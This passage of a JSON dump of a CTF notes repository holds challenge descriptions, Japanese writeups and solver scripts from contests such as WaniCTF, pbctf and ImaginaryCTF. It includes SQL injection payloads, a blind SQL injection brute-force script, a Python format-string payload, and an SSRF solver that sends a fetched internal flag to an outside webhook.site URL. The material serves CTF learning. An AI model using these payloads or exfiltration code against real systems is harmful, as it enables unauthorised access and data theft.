50010\n```\n\n[cry-oucs.zip](https://score.wanictf.org/storage/te7faf387uziv3gkvxwgz05jy2u86ma4/cry-oucs.zip)\n\nWriter : Laika\n" }, { "alpha_fraction": 0.6822429895401001, "alphanum_fraction": 0.8177570104598999, "avg_line_length": 22.77777862548828, "blob_id": "c09e1b24aaf10ee875717b5857774f65a6f9d9c6", "content_id": "5694104ba7cf18bc69199ff591d0651052fc75e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 262, "license_type": "no_license", "max_line_length": 94, "num_lines": 9, "path": "/2021/SECCON_Beginners_CTF_2021/Imaginary/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "虚数は好きですか?\n\n接続方法: nc imaginary.quals.beginners.seccon.jp 1337\n\nソースコード: [app.py](https://beginners-dist-production.s3.isk01.sakurastorage.jp/imaginary/app.py)\n\n4b5e2d8cbe6aad1156ae88a823b5c3a5896ef48e\n\n想定難易度: Medium\n" }, { "alpha_fraction": 0.5227272510528564, "alphanum_fraction": 0.8484848737716675, "avg_line_length": 43.33333206176758, "blob_id": "325a5df3f151897d1519d2b19fb78485b91344e3", "content_id": "76e903db488902713e3f94019370ccd2352aeb98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 132, "license_type": "no_license", "max_line_length": 113, "num_lines": 3, "path": "/2021/PlaidCTF_2021/xorsa/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "XOR + RSA = XORSA\n\n[Download](https://plaidctf.com/files/xorsa.29fb8e0ef0173eef5953d792373b7db98169018db6747f5e27d26c1c7cb98873.tgz)" }, { "alpha_fraction": 0.6634615659713745, "alphanum_fraction": 0.7115384340286255, "avg_line_length": 16.33333396911621, "blob_id": "543b30183c815ebc5fc5ad2c6b643c21445317ad", "content_id": "001d52d867878d0ac02681ce922748d5f24da26a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 104, "license_type": "no_license", 
"max_line_length": 35, "num_lines": 6, "path": "/2021/HeroCTF_v3/PwnQL_#1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Login as admin to get the flag.\n\nURL : http://chall1.heroctf.fr:8080\n\nFormat : Hero{}\nAuthor : xanhacks\n" }, { "alpha_fraction": 0.7350427508354187, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 38, "blob_id": "97ce1a99001283d527d085fb44dd6a4d2195e13c", "content_id": "99b849001410e5be6c90b303d55dbbcc126c5a1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 117, "license_type": "no_license", "max_line_length": 66, "num_lines": 3, "path": "/2021/BCACTF_2.0/Infinite_Zip/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Here's a zip, there's a zip. Zip zip everywhere.\n\n[flag.zip](https://objects.bcactf.com/bcactf2/zipproblem/flag.zip)\n" }, { "alpha_fraction": 0.6094147562980652, "alphanum_fraction": 0.6513994932174683, "avg_line_length": 27.10714340209961, "blob_id": "46099779b6ec5f4b4075615d48e67a1b16e91ca1", "content_id": "0f850fa137a9b16209e0c5dd7531926f48773a06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1160, "license_type": "no_license", "max_line_length": 117, "num_lines": 28, "path": "/2020/WaniCTF/SQL_Challenge_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nSQLインジェクションをしてフラグを入手する。ただし、使えるクエリ文字列には制限がある。\n\n```php\n//一部の文字は利用出来ません。以下の文字を使わずにFLAGを手に入れてください。\nif (preg_match('/\\s/', $year))\n exit('危険を感知'); //スペース禁止\nif (preg_match('/[\\']/', $year))\n exit('危険を感知'); //シングルクォート禁止\nif (preg_match('/[\\/\\\\\\\\]/', $year))\n exit('危険を感知'); //スラッシュとバックスラッシュ禁止\nif (preg_match('/[\\|]/', $year))\n exit('危険を感知'); //バーティカルバー禁止 \n\n//クエリを作成する。\n$query = \"SELECT * FROM anime WHERE years =$year\";\n```\n\nクエリパラメータに`(2016)OR(1=1)`を与える。すると、`SELECT * FROM anime WHERE years =(2016)OR(1=1)`が実行されてすべての`anime`カラムが取得できる。\n\nhttps://sql1.wanictf.org/index.php?year=(2016)OR(1=1)\n\n[参考]\n\n* https://security.stackexchange.com/questions/127655/would-removing-spaces-in-a-string-protect-against-sql-injection\n\n<!-- FLAG{53cur3_5ql_a283b4dffe}\t -->" }, { "alpha_fraction": 0.6673792004585266, "alphanum_fraction": 0.7315092086791992, "avg_line_length": 22.636363983154297, "blob_id": "dd438f4bdf4aa83d8689909108bc794c1b4bec56", "content_id": "84f7e1d666ba9e9ae0fea949f173469f88e78dbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3331, "license_type": "no_license", "max_line_length": 102, "num_lines": 99, "path": "/2020/pbctf_2020/Queensarah2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\n`nc`コマンドを実行してみると文字列が出力され、パスワードを求められる。\n\n入力したパスワードが違ったときは、そのパスワードを暗号化してくれるっぽい。\n\n```bash\n$ nc queensarah2.chal.perfect.blue 1\nThis is a restricted service! Decrypt this password to proceed:\n{'ywflzvbwvvyrmtfsgwiuanwgxpdfmztdgcgvqalohrnibwjl_pxrwiuaou'}\n> password\nThat's not quite right. Your password encrypts to this:\nvbfxjxpn\n> hello\nThat's not quite right. Your password encrypts to this:\nqw_qxn\n> pbctf\nThat's not quite right. Your password encrypts to this:\nbdqlck\n> a\nThat's not quite right. Your password encrypts to this:\ny_\n> aa\nThat's not quite right. Your password encrypts to this:\nsr\n> aaa\nThat's not quite right. 
Your password encrypts to this:\nlguh\n```\n\nプログラムを読むと、以下のように暗号化していることが分かる。\n\n例として、文字列 `hello` を暗号化する手順を示す。\n\n---\n\n1. `[a-z_]`のバイグラムを別のバイグラムに対応させた辞書`S_box`をランダムに作る(27\\*27通り)\n\n `{'he':'de', 'll':'dg', 'o_':'at' , ...}`\n\n1. 入力文字列の長さが奇数なら末尾に'_'をつける\n\n `hello` ⇒ `hello_`\n\n1. 辞書をもとに先頭から2文字ずつ変換する\n\n `hello_` ⇒ `dedgat`\n\n1. 文字列を偶数番目と奇数番目に分けてつなげる(シャッフル)\n\n `dedgat` ⇒ `dda`+`egt` ⇒ `ddaegt`\n\n1. 2~4 を `2 * ceil(log(len(message), 2))`回繰り返す (ただし最後の1回はシャッフルしない)\n\n `hello_` ⇒ `ddaegt` ⇒ `fgjtth` ⇒ `vlvued` ⇒ `ziagnh` ⇒ `yxl_tz` ⇒ `xnqsfv`\n\n---\n\n復号化するためには、辞書`S_box`の逆対応表があればよい。(`he`⇒`de`が暗号化なら`de`⇒`he`は復号化)\n\nただし`len(message)=2`のとき、2回暗号化されてしまうため、単純に逆にすれば求まるわけではない。((input)`he`⇒`de`⇒`??`(output))\n\n暗号化の方式は俗にいうブロック暗号なので、何か解読手段はないかと模索...\n\n* https://ja.wikipedia.org/wiki/ブロック暗号#ショートカット法\n\n# Solution\n\n**[writeup]**\n\n> for queensarah2, you can do a slide attack, or sqrt the permutation.\n>\n> slide attack was intended soln i think: \n>> https://www.robertxiao.ca/hacking/sarah2/\n>\n> solve script for queensarah2\n>> https://github.com/captainGeech42/ctf-writeups/tree/master/pbctf2020/queensarah2\n>\n> [via Discord](https://discord.com/channels/748672086838607943/785302038606643231/785453953970208768)\n\n\n> Here's my writeup for queensarah2 \n>> https://github.com/qxxxb/ctf/tree/master/2020/pbctf/queensarah2. \n>\n>I tried to explain the crypto clearly even tho my script is really bad :smiling_face_with_tear:\n>\n> [via Discord](https://discord.com/channels/748672086838607943/785302038606643231/785608839013597213)\n\n> https://project-euphoria.netlify.app/blog/9-pbctf-2020/\n\n2番目のwriteupが図で説明されていてわかりやすい。\n\n`odd cycle`にうまく当てはまれば`S_box`を復元できるので、復号化できるようになる。\n\n# Comment\n\n一番シンプルな2文字の置換に着目した点はよかった。同じアルゴリズムでも確率次第でうまくいく/いかないがある問題が出題されること分かった。" }, { "alpha_fraction": 0.6690140962600708, "alphanum_fraction": 0.7992957830429077, "avg_line_length": 94, "blob_id": "d86452261a746cee95b1b04d491aeb1bfd3a69cd", "content_id": "774c086ad304988b5c5bb0b6d3bf76e3ad1346ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 284, "license_type": "no_license", "max_line_length": 265, "num_lines": 3, "path": "/2021/angstromCTF_2021/sosig/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Oh man, RSA is so cool. But I don't trust the professionals, I do things MY WAY. And I'll make my encryption EXTRA secure with an extra thicc e! 
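To make the Queensarah2 round structure above concrete, here is a small model of the cipher exactly as the writeup describes it (my own reconstruction, not the challenge source): a random 27x27 bigram S-box, `_` padding, and the even/odd shuffle between substitutions, with the final round unshuffled:

```py
import math
import random
import string

ALPHABET = string.ascii_lowercase + "_"
BIGRAMS = [a + b for a in ALPHABET for b in ALPHABET]

def make_sbox(seed=None):
    out = BIGRAMS[:]
    random.Random(seed).shuffle(out)
    return dict(zip(BIGRAMS, out))      # random bigram -> bigram mapping (27*27)

def encrypt(message, sbox):
    if len(message) % 2:
        message += "_"                  # pad odd-length input
    rounds = 2 * math.ceil(math.log2(len(message)))
    for r in range(rounds):
        # substitute each 2-character block through the S-box
        message = "".join(sbox[message[i:i + 2]] for i in range(0, len(message), 2))
        if r != rounds - 1:             # the last round skips the shuffle
            message = message[0::2] + message[1::2]
    return message

print(encrypt("hello", make_sbox(seed=1)))
```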
You'll never crack [it](https://files.actf.co/70085a9944d5441143ecc6ecb90b9ff7d16f300d81eccc513c737cd83fa1eeab/out.txt)!\n\nAuthor: preterite" }, { "alpha_fraction": 0.6836734414100647, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 31.75, "blob_id": "2b007118128ffc1d7cdf819faf6a80faaa9deb39", "content_id": "4192a66efec1e7fb707fcff81c501cfaa0db6968", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 64, "num_lines": 12, "path": "/2020/KipodAfterFreeCTF/SSE_KEYGENME/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import angr\n\np = angr.Project('SSE_KEYGENME')\nmain_addr = p.loader.main_object.get_symbol('main').rebased_addr\nprint('main_addr = ',main_addr)\nstate = p.factory.entry_state()\nsim = p.factory.simulation_manager(state)\naddr_success = main_addr + (0xD48-0xC6D)\n# addr_failed = main_addr + (0xD4F-0xC6D)\nsim.explore(find=addr_success)\nif len(sim.found) > 0:\n print(sim.found[0].posix.dumps(0))" }, { "alpha_fraction": 0.6456834673881531, "alphanum_fraction": 0.7338129281997681, "avg_line_length": 31.764705657958984, "blob_id": "dd06ecc381c9c197d6e44f891a5f326822f7d943", "content_id": "c2b04a0e92b74919bfafc9ec7b16f6d130042384", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 556, "license_type": "no_license", "max_line_length": 130, "num_lines": 17, "path": "/2020/pbctf_2020/Sploosh/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Original\n# https://gist.github.com/u0pattern/92c01201e4f6b7139ba7e72c734afb1f\n\nimport requests\nfrom urllib.parse import quote\n\nlua=\"\"\"\nfunction main(splash)\n local treat = require(\"treat\")\n local json = splash:http_get('http://172.16.0.14/flag.php')\n local response=splash:http_get('https://webhook.site/25760c6e-5ef1-42f7-b8e1-bae8e3abbf4b?flag='.. 
treat.as_string(json.body))\nend \n\"\"\"\n \nurl='http://sploosh.chal.perfect.blue/api.php?url=http://splash:8050/execute?lua_source='+quote(lua)\nresponse=requests.get(url)\nprint(response.text)" }, { "alpha_fraction": 0.4503968358039856, "alphanum_fraction": 0.5615079402923584, "avg_line_length": 17.035715103149414, "blob_id": "a078a1d8a868476e00acd0054ff020c5e7010553", "content_id": "9d4c1e84a660d954ec66fccc5ebb045e7576f340", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 506, "license_type": "no_license", "max_line_length": 117, "num_lines": 28, "path": "/2021/Real_World_CTF_3rd/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Real World CTF 3rd\n\n* https://realworldctf.com/\n\n* 2021/01/09 11:00 JST — 2021/01/11 11:00 JST\n\n> M4x 2021/01/11\n> Another link if you want challenge attachments: https://github.com/chaitin/Real-World-CTF-3rd-Challenge-Attachments\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------- | ------------ | ------- | ----: | -----: |\n| checkin | [HOME](HOME) | welcome | 41 | 256 |\n\n### Unsolved\n\n---\n\n## Result\n\n* 41 points\n\n* 259 / 270 (> 1 pt)\n\n* 259 / 1772" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.7736842036247253, "avg_line_length": 26.285715103149414, "blob_id": "0fa5105e8cec84879eb8ddce3eab865bbddd0d77", "content_id": "e127f7c0d5dcdc3fd05ca8a661677931328e2743", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 220, "license_type": "no_license", "max_line_length": 79, "num_lines": 7, "path": "/2020/kksctf_open_2020/motor_sounds/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Жжжжжжжжжж, виииив, виииив, жжжжжжжж...\n\nZhzhzhzhzhzhzhzhzhzh, viiiiv, viiiiv, zzhzhzhzhzhzhzh ...\n\n[file](https://tasks.kksctf.ru/tasks/b15bd0dd-fd54-4112-8ba6-aade2a4b6414/file)\n\n@bork_dog" }, { "alpha_fraction": 0.6710526347160339, "alphanum_fraction": 0.7960526347160339, "avg_line_length": 49.66666793823242, "blob_id": "d7653257718bbe6e12356f649454b4c48c2134a3", "content_id": "8772340a9f65ebed6b674a6a1ff3956aacef473c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 110, "num_lines": 3, "path": "/2021/RaRCTF_2021/Secure_Uploader/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "A new secure, safe and smooth uploader!\n\n[secup.zip - f8db2a](https://files-ctf.rars.win/challenge-files/12/f8db2a03ecb1dcd6f44259fd9aade975/secup.zip)\n" }, { "alpha_fraction": 0.46915459632873535, "alphanum_fraction": 0.5247524976730347, "avg_line_length": 24.745098114013672, "blob_id": "83aa3035dfdccc1b3d09b12656e0acae3b2c2f40", "content_id": "2ccbd59520b9b1e52184beb73813b20d0bed8ec2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1431, "license_type": "no_license", "max_line_length": 113, "num_lines": 51, "path": "/2021/ImaginaryCTF_2021/Formatting/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\n#!/usr/bin/env python3\n\nart = '''\n 88\n ,d 88\n 88 88\n,adPPYba, MM88MMM ,adPPYba, 8b,dPPYba, 88 ,d8 ,adPPYba,\nI8[ \"\" 88 a8\" \"8a 88P' `\"8a 88 ,a8\" I8[ \"\"\n `\"Y8ba, 88 8b d8 88 88 8888[ `\"Y8ba,\naa ]8I 88, \"8a, ,a8\" 88 88 88`\"Yba, aa 
]8I\n`\"YbbdP\"' \"Y888 `\"YbbdP\"' 88 88 88 `Y8a `\"YbbdP\"'\n'''\n\nflag = open(\"flag.txt\").read()\n\nclass stonkgenerator: # I heard object oriented programming is popular\n def __init__(self):\n pass\n def __str__(self):\n return \"stonks\"\n\ndef main():\n print(art)\n print(\"Welcome to Stonks as a Service!\")\n print(\"Enter any input, and we'll say it back to you with any '{a}' replaced with 'stonks'! Try it out!\")\n while True:\n inp = input(\"> \")\n print(inp.format(a=stonkgenerator()))\n\nif __name__ == \"__main__\":\n main()\n```\n\n`print(inp.format(a=stonkgenerator()))`の部分で`flag`を表示させれば良さそう。\n\n* [Vulnerability in str.format() in Python](https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/)\n\n上記サイトの通り、\n\n```\n{a.__init__.__globals__[flag]}\n```\n\nを入力したところ、フラグが出力された。\n\n<!-- ictf{c4r3rul_w1th_f0rmat_str1ngs_4a2bd219} -->\n" }, { "alpha_fraction": 0.5297029614448547, "alphanum_fraction": 0.5313531160354614, "avg_line_length": 30.947368621826172, "blob_id": "ce4613905f0955e2c4babe73dff99854c869e3ef", "content_id": "d03cad562919ce54cdf1b46bed9109442cf08972", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 606, "license_type": "no_license", "max_line_length": 94, "num_lines": 19, "path": "/2021/WaniCTF21-spring/watch_animal/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import requests\nimport string\n\nwith requests.Session() as session:\n r = session.get(\"https://watch.web.wanictf.org/\")\n chars = string.printable\n chars = chars.replace('%','')\n chars = chars.replace('_','')\n password = \"\"\n while True:\n for c in chars :\n data = {'email':'[email protected]', 'password': \"' OR password LIKE '\"+ password + c + \"%\"}\n r = session.post(\"https://watch.web.wanictf.org/\",data=data)\n if \"Login Failed...\" not in r.text :\n break\n if c == chars[-1]:\n break\n password += c\n print(password)" }, { "alpha_fraction": 0.837837815284729, "alphanum_fraction": 0.837837815284729, "avg_line_length": 26, "blob_id": "21d2cfbcbd62d4246c11759be04fdd439d942cb1", "content_id": "5616cb388274e07797272d74c430a48cc38de416", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 460, "license_type": "no_license", "max_line_length": 93, "num_lines": 11, "path": "/2020/WaniCTF/logged_flag/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "ワニ博士が問題を作っていたので、作っているところをキーロガーで勝手に記録してみました。\n\n先に公開してしまいたいと思います。\n\n(ワニ博士は英字配列のキーボードを使っています)\n\n[key_log.txt](https://score.wanictf.org/storage/mxzwrxngbjjguotyxlsygefbhbwfhzik/key_log.txt)\n\n[secret.jpg](https://score.wanictf.org/storage/clijmiiqmqkmyodhdflxrnlkuusllajk/secret.jpg)\n\nWriter : takushooo" }, { "alpha_fraction": 0.6289308071136475, "alphanum_fraction": 0.7610062956809998, "avg_line_length": 25.5, "blob_id": "0873588dfc7f34beaf3ef2fbe204b74350b7e582", "content_id": "29880fda6e1d91f7b5845004e3c96f8712fa47df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 159, "license_type": "no_license", "max_line_length": 100, "num_lines": 6, "path": "/2021/HeroCTF_v3/Russian_Doll/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Go deeper !\n\nFormat : Hero{}\nAuthor : Enarior / 
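The `str.format` traversal used against the Formatting service above reproduces offline; a self-contained demo (class and variable names here are mine): any `def`-ed method carries `__globals__`, which is the module namespace holding the flag variable.

```py
SECRET = "ictf{placeholder}"        # stands in for flag.txt's contents

class StonkGenerator:
    def __init__(self):             # a def-ed method exposes __globals__
        pass
    def __str__(self):
        return "stonks"

# same shape as the winning payload in the writeup above
payload = "{a.__init__.__globals__[SECRET]}"
print(payload.format(a=StonkGenerator()))   # -> ictf{placeholder}
```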
xanhacks\n\n[archive.zip](https://www.heroctf.fr/files/0de4173c5ed705183aa56eba216325a5/archive.zip?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjIwfQ.YIUu7Q.fHNGLbyn8rBYdgupVBxHVqJsHH4)\n" }, { "alpha_fraction": 0.704960823059082, "alphanum_fraction": 0.7232375741004944, "avg_line_length": 13.222222328186035, "blob_id": "20cda18c43b4946ef7b0a15cb219e718e0dfebca", "content_id": "c8bbfb0ac574a17ae9aa1807006d2abbd9edb2b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 575, "license_type": "no_license", "max_line_length": 82, "num_lines": 27, "path": "/2020/kksctf_open_2020/not_a_terminator/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\n以下の画像が与えられる。\n\n![](pic.png)\n\nしかし、法則がわからなかったので解けず。\n\n問題タイトルの`terminator`、 問題文の`Arnie = Arnold (Schwarzenegger)` がヒントかな...?\n\n# Solution\n\n**[writeup]**\n\n* https://github.com/hackalcubo/CTF-Writeups/tree/main/kksctf2020/not_a_terminator\n\nどうやら映画「エイリアンvsプレデター」のプレデターのフォントらしい。\n\n* https://fonts2u.com/predator.font\n\n<!-- kks{Y0uNgArni3IsCoOl} -->\n\n# Comment\n\nググり力が足りなかった。" }, { "alpha_fraction": 0.5952879786491394, "alphanum_fraction": 0.6738219857215881, "avg_line_length": 33.125, "blob_id": "88f1d5fbf28387ecc179aab1b6f88ebeeff5e03a", "content_id": "5e4a20dc3cfaddd69075bed406a99a87c5637a17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1958, "license_type": "no_license", "max_line_length": 80, "num_lines": 56, "path": "/2020/WaniCTF/ALLIGATOR_02/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`Volatility`を使ってコマンドプロンプトの出力を確認する。\n\n[参考]\n\n* https://troushoo.blog.fc2.com/blog-entry-174.html\n\n```bash\n$ vol.py -f ALLIGATOR.raw --kdbg=0x82754de8 --profile=Win7SP1x86_23418 consoles\n\nConsoleProcess: conhost.exe Pid: 336\nConsole: 0x4f81c0 CommandHistorySize: 50\nHistoryBufferCount: 2 HistoryBufferMax: 4\nOriginalTitle: C:\\Program Files\\OpenSSH\\bin\\cygrunsrv.exe\nTitle: C:\\Program Files\\OpenSSH\\bin\\cygrunsrv.exe\nAttachedProcess: sshd.exe Pid: 856 Handle: 0x54\n----\nCommandHistory: 0xb0960 Application: sshd.exe Flags: Allocated\nCommandCount: 0 LastAdded: -1 LastDisplayed: -1\nFirstCommand: 0 CommandCountMax: 50\nProcessHandle: 0x54\n----\nCommandHistory: 0xb07f0 Application: cygrunsrv.exe Flags: \nCommandCount: 0 LastAdded: -1 LastDisplayed: -1\nFirstCommand: 0 CommandCountMax: 50\nProcessHandle: 0x0\n----\nScreen 0xc6098 X:80 Y:300\nDump:\n\n**************************************************\nConsoleProcess: conhost.exe Pid: 3736\nConsole: 0x4f81c0 CommandHistorySize: 50\nHistoryBufferCount: 1 HistoryBufferMax: 4\nOriginalTitle: %SystemRoot%\\system32\\cmd.exe\nTitle: Administrator: C:\\Windows\\system32\\cmd.exe\nAttachedProcess: cmd.exe Pid: 3728 Handle: 0x5c\n----\nCommandHistory: 0x350440 Application: cmd.exe Flags: Allocated, Reset\nCommandCount: 1 LastAdded: 0 LastDisplayed: 0\nFirstCommand: 0 CommandCountMax: 50\nProcessHandle: 0x5c\nCmd #0 at 0x3546d8: type C:\\Users\\ALLIGATOR\\Desktop\\flag.txt\n----\nScreen 0x3363b8 X:80 Y:300\nDump:\nMicrosoft Windows [Version 6.1.7601] \nCopyright (c) 2009 Microsoft Corporation. All rights reserved. 
\n \nC:\\Users\\ALLIGATOR>type C:\\Users\\ALLIGATOR\\Desktop\\flag.txt \nFLAG{y0u_4re_c0n50les_master} \nC:\\Users\\ALLIGATOR> \n```\n\n<!-- FLAG{y0u_4re_c0n50les_master} -->" }, { "alpha_fraction": 0.30571991205215454, "alphanum_fraction": 0.36785009503364563, "avg_line_length": 32.83333206176758, "blob_id": "05d821e0cae070f16aed6e861bea7f905ddc4310", "content_id": "b8bef204b38457da201559a5d17d1a79192d8cc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1017, "license_type": "no_license", "max_line_length": 99, "num_lines": 30, "path": "/2020/kksctf_open_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# #kksctf open 2020\n\n* https://open.kksctf.ru/\n\n* 2020/12/12 18:00 JST — 2020/12/13 18:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------ | -------------------------------------- | ---------------------------- | ----: | -----: |\n| Crypto | [fonction_spéciale](fonction_speciale) | Look(Count)-and-say sequence | 240 | 91 |\n| Web | [Lynx](Lynx) | Lynx, robots.txt | 204 | 113 |\n| Misc | [motor_sounds](motor_sounds) | G-code | 268 | 77 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------ | ------------------------------------ | ----------- | ----: | -----: |\n| Crypto | [not_a_terminator](not_a_terminator) | guessing | 523 | 17 |\n| Misc | [bson](bson) | MessagePack | 331 | 53 |\n\n---\n\n## Result\n\n* 722 points\n\n* 81 / 229 (> 1 pt)" }, { "alpha_fraction": 0.598870038986206, "alphanum_fraction": 0.7796609997749329, "avg_line_length": 58, "blob_id": "7fb5dff14f188e562d19330c6a54cbab96c7a4d0", "content_id": "17cd11285e843e10bc703a26f89a81b98cbfb106", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 177, "license_type": "no_license", "max_line_length": 104, "num_lines": 3, "path": "/2021/RaRCTF_2021/Archer/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It's battle time! 
We're giving you one shot, one kill - choose wisely.\n\n[archer - 056a06](https://files-ctf.rars.win/challenge-files/11/056a064c0693321df2783871fb9228a5/archer)\n" }, { "alpha_fraction": 0.48230770230293274, "alphanum_fraction": 0.5761538743972778, "avg_line_length": 19, "blob_id": "12554c5cf07298ede3f4f0f9d9cfacd11bb26f30", "content_id": "2308a0d5f6f027782bc03f1e14fd2c0d1bbf8afd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1460, "license_type": "no_license", "max_line_length": 114, "num_lines": 65, "path": "/2021/BCACTF_2.0/Wasm_Protected_Site_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49157/ にアクセスする。\n\nパスワード入力フォームが表示されるので、適当に入力してみる。\n\n![](img/2021-06-13-14-20-52.png)\n\nソース周りを調べると、`wasm`というファイルを見つけた。\n\n```wasm\n(module\n (memory $memory (;0;) (export \"memory\") 1)\n (func $compareString (;0;) (export \"compareString\") (param $str1 (;0;) i32) (param $str2 (;1;) i32) (result i32)\n (local $index (;2;) i32)\n loop $label0\n local.get $index\n local.get $str1\n i32.add\n i32.load8_u\n local.get $index\n local.get $str2\n i32.add\n i32.load8_u\n i32.ne\n if\n i32.const 0\n return\n end\n local.get $index\n local.get $str1\n i32.add\n i32.load8_u\n if\n local.get $index\n i32.const 1\n i32.add\n local.set $index\n br $label0\n end\n i32.const 1\n return\n end $label0\n i32.const 0\n return\n )\n (func $checkPassword (;1;) (export \"checkPassword\") (param $addr (;0;) i32) (result i32)\n block $label0\n local.get $addr\n i32.const 1040\n call $compareString\n br_if $label0\n i32.const 1000\n return\n end $label0\n i32.const 1016\n return\n )\n (data (i32.const 1000) \"INVALIDPASSWORD\\00bcactf{w4sm-m4g1c-xRz5}\\00WASMP4S5W0RD\\00\")\n)\n```\n\nここにそのままフラグが書かれていた。\n\n<!-- bcactf{w4sm-m4g1c-xRz5} -->\n" }, { "alpha_fraction": 0.6221009492874146, "alphanum_fraction": 0.6357434988021851, "avg_line_length": 17.794872283935547, "blob_id": "1d74e248a82666446ebd9ec6dbc104bc358c4ae7", "content_id": "acbdd83431c6c050074a41abac14654c0652c258", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 761, "license_type": "no_license", "max_line_length": 38, "num_lines": 39, "path": "/2020/WaniCTF/Basic_RSA/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\nfrom Crypto.Util.number import inverse\n\nconn = remote('rsa.wanictf.org',50000)\n\n# 第1段階\nconn.recvuntil('p = ')\np = int(conn.recvline())\nconn.recvuntil('q = ')\nq = int(conn.recvline())\nn = p * q\nconn.sendline(str(n))\n\n# 第2段階\nconn.recvuntil('m = ')\nm = int(conn.recvline())\nconn.recvuntil('e = ')\ne = int(conn.recvline())\nconn.recvuntil('n = ')\nn = int(conn.recvline())\nc = pow(m,e,n)\nconn.sendline(str(c))\n\n# 第3段階\nconn.recvuntil('p = ')\np = int(conn.recvline())\nconn.recvuntil('q = ')\nq = int(conn.recvline())\nconn.recvuntil('e = ')\ne = int(conn.recvline())\nconn.recvuntil('c = ')\nc = int(conn.recvline())\nd = inverse(e,(p-1)*(q-1))\nm = pow(c,d,p*q)\nconn.sendline(str(m))\n\n# フラグ出力\nprint(conn.recvline())\nconn.close()\n" }, { "alpha_fraction": 0.6141906976699829, "alphanum_fraction": 0.7671840190887451, "avg_line_length": 22.789474487304688, "blob_id": "18313584bf66768f8d21414b3fc4ccf2dc5fc832", "content_id": "303f1ce31148ce5c99350b8198b3ab4cd2f2a9c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 719, "license_type": 
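The Wasm writeup above can also be confirmed without a browser: the `(data (i32.const 1000) ...)` segment plus the constants in `checkPassword` pin down which string lives at which address. A small offset check (mine, copying the bytes from the wat listing):

```py
# byte-for-byte copy of the wat data segment above, loaded at offset 1000
data = b"INVALIDPASSWORD\x00bcactf{w4sm-m4g1c-xRz5}\x00WASMP4S5W0RD\x00"
BASE = 1000

def cstring(addr):
    tail = data[addr - BASE:]
    return tail[:tail.index(b"\x00")].decode()

print(cstring(1040))  # compared against the input -> the expected password
print(cstring(1016))  # returned on success -> the flag
print(cstring(1000))  # returned on failure -> INVALIDPASSWORD
```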
